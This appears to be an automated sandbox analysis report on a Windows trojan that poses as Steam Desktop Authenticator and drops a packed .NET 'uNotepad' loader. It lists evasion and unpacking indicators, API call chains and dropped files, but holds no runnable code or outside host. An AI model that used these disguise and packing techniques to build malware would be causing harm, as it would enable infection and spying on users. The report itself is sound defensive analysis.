Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 0000000140086C40 appears 51 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400A4F28 appears 34 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400A9358 appears 45 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 0000000140035BF0 appears 107 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 0000000140035870 appears 77 times
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: String function: 00000001400C2598 appears 38 times
PE / OLE file has an invalid certificate
Source: kS2dqbsDwD.exe Static PE information: invalid certificate
PE file contains strange resources
Source: kS2dqbsDwD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kS2dqbsDwD.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 325.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: kS2dqbsDwD.exe, 00000000.00000002.306945204.0000000000880000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe, 00000000.00000000.201076729.000000014013D000.00000008.00020000.sdmp Binary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameOtxiH.exe2 vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe, 00000000.00000002.306924616.0000000000850000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs kS2dqbsDwD.exe
Source: kS2dqbsDwD.exe Binary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe
Source: 325.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: kS2dqbsDwD.exe Static PE information: Section: .MPRESS1 ZLIB complexity 1.00031240161
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/29@9/5
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW, 0_2_0000000140036D50
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00000001400624E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400C22C0 GetDiskFreeSpaceW, 0_2_00000001400C22C0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140088BA0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW, 0_2_0000000140088BA0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe File created: C:\Users\user\AppData\Roaming\field Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File created: C:\Users\user\AppData\Local\Temp\tmpBE63.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Roaming\325.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: kS2dqbsDwD.exe Virustotal: Detection: 20%
Source: kS2dqbsDwD.exe ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Users\user\Desktop\kS2dqbsDwD.exe 'C:\Users\user\Desktop\kS2dqbsDwD.exe'
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Process created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325
Source: C:\Users\user\AppData\Roaming\325.exe Process created: C:\Users\user\AppData\Roaming\325.exe {path}
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Process created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325 Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Process created: C:\Users\user\AppData\Roaming\325.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\325.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: kS2dqbsDwD.exe Static PE information: Image base 0x140000000 > 0x60000000

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Unpacked PE file: 0.2.kS2dqbsDwD.exe.140000000.2.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
.NET source code contains potential unpacker
Source: 325.exe.0.dr, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.cs .Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary, 0_2_0000000140060290
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
PE file contains an invalid checksum
Source: kS2dqbsDwD.exe Static PE information: real checksum: 0x9a0ca should be: 0xa1dfe
Source: 325.exe.0.dr Static PE information: real checksum: 0x0 should be: 0xf8b72
PE file contains sections with non-standard names
Source: kS2dqbsDwD.exe Static PE information: section name: .MPRESS1
Source: kS2dqbsDwD.exe Static PE information: section name: .MPRESS2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095CF80 push eax; iretd 0_3_0095CF81
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095CF80 push eax; iretd 0_3_0095CF81
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095CF80 push eax; iretd 0_3_0095CF81
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095CD08 pushad ; retf 0_3_0095CD11
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095CD08 pushad ; retf 0_3_0095CD11
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095CD08 pushad ; retf 0_3_0095CD11
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095F2A3 push esi; retf 0000h 0_3_0095F2A4
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095F2A3 push esi; retf 0000h 0_3_0095F2A4
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095F2A3 push esi; retf 0000h 0_3_0095F2A4
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099BAD8 push esi; retn 0000h 0_3_0099BADF
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099BAD8 push esi; retn 0000h 0_3_0099BADF
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099BAD8 push esi; retn 0000h 0_3_0099BADF
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099CACC push esp; ret 0_3_0099CADA
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099CACC push esp; ret 0_3_0099CADA
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099CACC push esp; ret 0_3_0099CADA
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099D9FB push edi; ret 0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099D9FB push edi; ret 0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099D9FB push edi; ret 0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099DF01 push ds; iretd 0_3_0099DFA5
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099DF01 push ds; iretd 0_3_0099DFA5
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099DF01 push ds; iretd 0_3_0099DFA5
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_00993723 pushfd ; ret 0_3_00993725
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_00993723 pushfd ; ret 0_3_00993725
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_00993723 pushfd ; ret 0_3_00993725
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099DA4B push edi; ret 0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099DA4B push edi; ret 0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0099DA4B push edi; ret 0_3_0099DA9A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_00996762 push es; retn 0002h 0_3_0099677A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_00996762 push es; retn 0002h 0_3_0099677A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_00996762 push es; retn 0002h 0_3_0099677A
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_3_0095CF80 push eax; iretd 0_3_0095CF81
Source: initial sample Static PE information: section name: .MPRESS1 entropy: 7.99951858505
Source: initial sample Static PE information: section name: .text entropy: 7.5685116349
Source: 325.exe.0.dr, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 325.exe.0.dr, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 325.exe.0.dr, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 325.exe.0.dr, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 325.exe.0.dr, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 325.exe.0.dr, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 325.exe.0.dr, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 325.exe.0.dr, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 325.exe.0.dr, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 325.exe.0.dr, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form_Main.cs High entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MDSDDD.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.cs High entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MainWindow.cs High entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.cs High entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionOfElements.cs High entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/About.cs High entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/AramaFormu.cs High entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/TextUtility.cs High entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/uNote.cs High entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe File created: C:\Users\user\AppData\Roaming\325.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014008B0A0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow, 0_2_000000014008B0A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_00000001400881E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen, 0_2_00000001400881E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014008B280 GetWindowThreadProcessId,GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop, 0_2_000000014008B280
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_000000014005E330 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC, 0_2_000000014005E330
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus, 0_2_0000000140075850
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe Code function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus, 0_2_0000000140075850
